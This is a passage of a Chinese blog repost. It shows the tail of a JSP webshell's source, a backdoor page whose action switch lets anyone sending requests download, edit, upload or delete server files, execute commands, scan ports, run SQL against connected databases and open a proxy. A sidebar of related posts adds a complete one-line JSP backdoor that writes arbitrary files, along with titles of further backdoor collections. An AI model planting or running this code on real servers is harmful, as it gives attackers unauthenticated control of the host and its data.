            document.write( " <option value= " + i + " > " + i + " </option> " );
        }
        document.write( " </select> " );
        document.write( " <input name='Action' type='button' οnclick='top.address.Action.value=\ " d\ " ;this.form.submit();' value='dateChange'> " );
        document.write( " <input name='cancel' οnclick='history.back();' type='button' value='Cancel'> " );
    }
    function zipFile(file){
         if ((zipF = prompt( " save to ? " ,file + " /down.zip " )) != "" && zipF != null ){
            top.address.Action.value = " Z " ;
            top.address.FolderPath.value = file;
            top.address.Filename.value = zipF;
            top.address.submit();
        }
    }
    function setDataBase(f){
        driverName = new  Array();
        driverName[ 0 ] = " com.sybase.jdbc2.jdbc.SybDriver " ;
        driverName[ 1 ] = " com.microsoft.jdbc.sqlserver.SQLServerDriver " ;
        driverName[ 2 ] = " com.mysql.jdbc.Driver " ;
        driverName[ 3 ] = " oracle.jdbc.driver.OracleDriver " ;
        driverName[ 4 ] = " com.ibm.db2.jdbc.app.DB2Driver " ;
        driverName[ 5 ] = " org.postgresql.Driver " ;
        conUrl = new  Array();
        conUrl[ 0 ] = " jdbc:jtds:sybase://host:port/database " ;
        conUrl[ 1 ] = " jdbc:microsoft:sqlserver://host:port;DatabaseName= " ;
        conUrl[ 2 ] = " jdbc:mysql://host:port/database " ;
        conUrl[ 3 ] = " jdbc:oracle:thin:@host:port:database " ;
        conUrl[ 4 ] = " jdbc:db2://host:port/database " ;
        conUrl[ 5 ] = " jdbc:postgresql://host:port/database " ;

        f.driver.value = driverName[f.DB.selectedIndex];
        f.conUrl.value = conUrl[f.DB.selectedIndex];
    }
 </ script >
</ head >
< body >
<%
    String Action = request.getParameter( " Action " );
     char  action = (Action == null ? " 0 " :Action).charAt( 0 );
     try {
         switch (action){
         // each skill
             case   ' M ' :mainMenu(out,WEB_SITE); break ;
             case   ' F ' :showFiles(out,encodeChange(request.getParameter( " FolderPath " ))); break ;
             case   ' S ' :showSystemInfo(out); break ;
             case   ' L ' :servletInfo(config,out); break ;
             case   ' D ' :downFile(encodeChange(request.getParameter( " Filename " )),response); return ;
             case   ' E ' :editFile(encodeChange(request.getParameter( " Filename " )),out); break ;
             case   ' R ' :deleteFile(encodeChange(request.getParameter( " Filename " )),out); break ;
             case   ' K ' :saveFile(encodeChange(request.getParameter( " filename " )),request.getParameter( " FileContent " ).getBytes( " ISO-8859-1 " ),out); break ;
             case   ' N ' :renameFile(encodeChange(request.getParameter( " Filename " )),out); break ;
             case   ' P ' :copyFile(encodeChange(request.getParameter( " Filename " )),out); break ;
             case   ' d ' :dateChange(encodeChange(request.getParameter( " Filename " )),request.getParameter( " year " ),request.getParameter( " month " ),request.getParameter( " day " ),out); break ;
             case   ' r ' :execFile(encodeChange(request.getParameter( " execFile " )),out); break ;
             case   ' Z ' :zip(encodeChange(request.getParameter( " Filename " )),encodeChange(request.getParameter( " FolderPath " )),out); break ;
             case   ' U ' :upfile(request,out,encodeChange(request.getParameter( " UPaddress " ))); break ;
             case   ' n ' :newFolder(out,encodeChange(request.getParameter( " Filename " ))); break ;
             case   ' A ' :reflectAPI(out,encodeChange(request.getParameter( " Filename " ))); break ;
             case   ' I ' :scanPort(out,encodeChange(request.getParameter( " IPaddress " )),Integer.parseInt(request.getParameter( " startPort " )),Integer.parseInt(request.getParameter( " endPort " ))); break ;
             case   ' s ' :ConnectionDBM(out,encodeChange(request.getParameter( " driver " )),encodeChange(request.getParameter( " conUrl " )),encodeChange(request.getParameter( " user " )),encodeChange(request.getParameter( " password " )),encodeChange(request.getParameter( " run " )),encodeChange(request.getParameter( " sqlcmd " ))); break ;
             case   ' H ' :switchProxyService(out); break ;
             case   ' i ' :userInterFaces(out); break ;
             case   ' T ' :systemTools(out); break ;
             default :
                mainForm(WEB_SITE,out); break ;
        }
    } catch (Exception e){
    }
    out.print( " </body></html> " );
    out.close();

 %>

 

 

转载于:https://www.cnblogs.com/xewnwsl2001/archive/2010/11/27/1889977.html

dfnpa06442
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
两个jsp后门
04-02
包含两个jsp后门,第一个被分解成了java代码用于学习,完善了其在线命令功能(版本不能收到输出结果)
jsp后门
收集盒 Book box
08-30 4482
by 园长MM  一:执行系统命令: 无回显执行系统命令: ? 1 "i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后不会有任何回显,用来反弹个shell很方便。 有回显带密码验证的:
我在代码里面故意留个后门漏洞,结果发生了...
最新发布
程序IT圈
07-29 49
大家好,我是小猿!昨天我在逛知乎的时候,看到了这么一个问题:我看到了三个非常有意思的回答,分享给大家一看。首先是这个为了防止项目交付后收不到尾款埋下后门的回答:答主:特立独行的猪链接:https://www.zhihu.com/question/531724027/answer/2487270093早年给某台企做外包项目,定制一个Android系统的ROM。开发费用16万,一年期维护费用2万。开发...
JSP全能管理系统1.0-update08.1.10
Quantum Intelligence
10-09 8777
功能如下文件: 复制  移动 修改日期 删除 编辑 下载 上传 新建目录: 复制 移动 修改日期 打包zip 新建系统: 查看系统信息  环境变量信息 容器信息杂项: 运行(系统命令/文件)  API类反射 扫描远程机器端口  开启本机HTTP代理数据库: 查看数据库信息  查看数据库函数 查看数据库存储过程  执行SQL其中开启 HTTP代理由为特出~ 呵呵 只要别人一运
JSP一句话后门
01-08
<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes()); %> 使用方法: 提交url! jsp?f=1.txt” target=”_blank”>http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld 然后:http://www.whitehouse.net
JSP 2:jsp中的java代码
ZJLOVE的博客
10-08 3528
※ 如何写一个jsp页面以及在页面中如何写java代码。    jsp页面中主要写的东西分为三部分:     1. jsp的脚本元素     1.1表达式(expression) 形式:&lt;%= %&gt; 例如:&lt;%="hello" %&gt; &lt;%=1+1 %&gt; &lt;%=s.ge...
经典强大的 2个jsp后门
06-16
1. **JSP后门基础**:JSP后门是通过在JSP页面中植入恶意代码来实现的,这些代码可以在服务器端执行,允许未经授权的远程访问和控制。常见的JSP后门可能包括执行系统命令、读取或写入文件、窃取敏感数据等。 2. **...
jsp java 登陆界面代码_jsp登陆界面源代码
weixin_28740399的博客
02-16 5456
展开全部1、login.jsp文件pageEncoding="GB18030"%>登录62616964757a686964616fe59b9ee7ad9431333366306436页面用户名:密码: type="reset" value="重置" style="background-color:red">2、judge.jsp文件pageEncoding="GB18030"%>...
jsp论坛源代码(附数据库文件)(创)
06-23
【标题】"jsp论坛源代码(附数据库文件)(创)"揭示了这是一个基于Java Server Pages(JSP)技术开发的论坛系统,并且包含了数据库文件。这个系统是创的,意味着它是由开发者独立设计和实现的,可能具有独特的...
企业门户网站JSP代码
05-28
3. **JSP动作**:如`<jsp:useBean>`用来实例化JavaBean,`<jsp:setProperty>`设置Bean的属性,`<jsp:getProperty>`获取Bean的属性值。 4. **Servlet**:虽然JSP可以直接处理HTTP请求,但在大型项目中,通常会使用...
JFolder_JSP后门代码
as20060104的专栏
05-23 1022
JFolder_JSP后门代码(B) return sRet; } public String deleteFile(String path, String curUri, String[] files2Delete) { String sRet = ""; File tmpFile = null; try { for (int i = 0; i    tmp
java jsp 木马_Jsp后门Jsp 一句话木马后门详解
weixin_39692623的博客
12-21 885
public static String getPassword() throws IOException {return "023";}String cs = "UTF-8";String encoding(String s) throws Exception {return new String(s.getBytes("ISO-8859-1"), cs);}Connection getConn...
java 后台 jsp
zhengzhao_ys的博客
06-06 645
jsp
jsp java 后台_jsp servlet javaBean后台分页实例代码解析
weixin_36476826的博客
02-26 110
首先后台分页需要理清分页思路,把数据库里面需要分页的信息放到List集合中,然后按照页面反馈给后台的页码对List集合进行SubList切割把切完的List传到前端进行显示。1.分页的demo文件结构图导入的包2.代码SplitPageServlet代码package ActionServlet;import java.io.IOException;import java.sql.SQLExcep...
JSP WebSehll 后门脚本
悦分享
08-01 1322
目前很多大型厂商都选择使用Java进行Web项目的开发,近年来随着各种JAVA指定环境RCE漏洞的出现,JavaWeb的安全逐渐被人们所重视,与漏洞相关的还有用于后期维持权限的Webshell。与PHP不同的是,JSP的语言特性较为严格,属于强类型语言,并且在JDK9以前并没有所谓的eval函数。一般而言JSP的变形免杀较为困难,但是依旧存在很多的”黑魔法”。不知攻,焉知防。阿里云安骑士Webshell检测系统在迭代升级过程中,除了内部的不断绕过尝试以外,也长期邀请大量白帽子进行持续的绕过测试。...
jsp页面跳转后台代码的方式总结~
mll999888的专栏
03-14 3861
jsp页面跳到后台代码,有如下几种方式:     action方式;    jquery方式,代码如下: function regCust(){         $('#containerFRM').form(                 'submit',                 {                     "url" : "${webAppUrl}/c
JSP基础教程:源代码解析
"该资源为一个166页的JSP基础教程,包含了多个示例代码,涵盖了JSP的基本语法和应用,如变量、循环、方法、文件操作等概念。" JSP(JavaServer Pages)是一种动态网页技术,用于创建交互式的Web应用程序。在Java...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值